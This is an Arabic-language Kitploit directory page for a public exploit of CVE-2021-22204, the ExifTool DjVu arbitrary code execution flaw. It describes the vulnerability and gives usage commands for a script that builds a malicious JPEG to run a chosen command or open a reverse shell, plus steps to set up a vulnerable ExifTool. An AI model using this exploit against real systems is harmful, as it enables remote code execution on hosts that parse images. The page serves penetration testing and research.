Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-CVE-2021-22204 — استغلال لـ CVE-2021-22204 (ExifTool) - تنفيذ كود عشوائي | Kitploit
أدوات/GitHubGitHub/unicordev/exploit-cve-2021-22204
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

استغلال لـ CVE-2021-22204 (ExifTool) - تنفيذ كود عشوائي

عرض المستودع
536منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

استغلال لـ CVE-2021-22204 (ExifTool) - تنفيذ أكواد عشوائي

GitHub CVE Cover

أعجبك هذا المستودع؟ امنحنا ⭐!

لأغراض تعليمية وبحثية أمنية مرخصة فقط.

مؤلف الاستغلال

@UNICORDev بواسطة (@NicPWNs و @Dev-Yeoj)

وصف الثغرة

التحييد غير السليم لبيانات المستخدم في تنسيق ملف DjVu في ExifTool من الإصدار 7.44 فما فوق يسمح بتنفيذ أكواد عشوائية عند تحليل الصورة الخبيثة.

وصف الاستغلال

استخدم هذا الاستغلال لإنشاء حمولة صورة JPEG يمكن استخدامها مع إصدار ExifTool ضعيف لتنفيذ الأكواد. يمكن توفير أمر مخصص أو إنشاء شل عكسي. يتم إنشاء صورة JPEG تلقائياً، واختيارياً، يمكن توفير صورة JPEG مخصصة لإدراج الحمولة فيها.

الاستخدام

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

الخيارات

root@kitploit:~
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.

التحميل

تحميل exploit-CVE-2021-22204.py من GitHub

تحميل exploit-CVE-2021-22204.py من ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

متطلبات الاستغلال

  • python3
  • djvulibre-bin
  • exiftool

عرض توضيحي

Demo Gif

تم اختباره على

Exiftool Version 12.23

ينطبق على

Exiftool Versions 7.44 - 12.23

البيئة الضعيفة

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

اختبار الحمولة المولدة

root@kitploit:~
exiftool image.jpg

الاعتمادات

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
تنزيل الأداة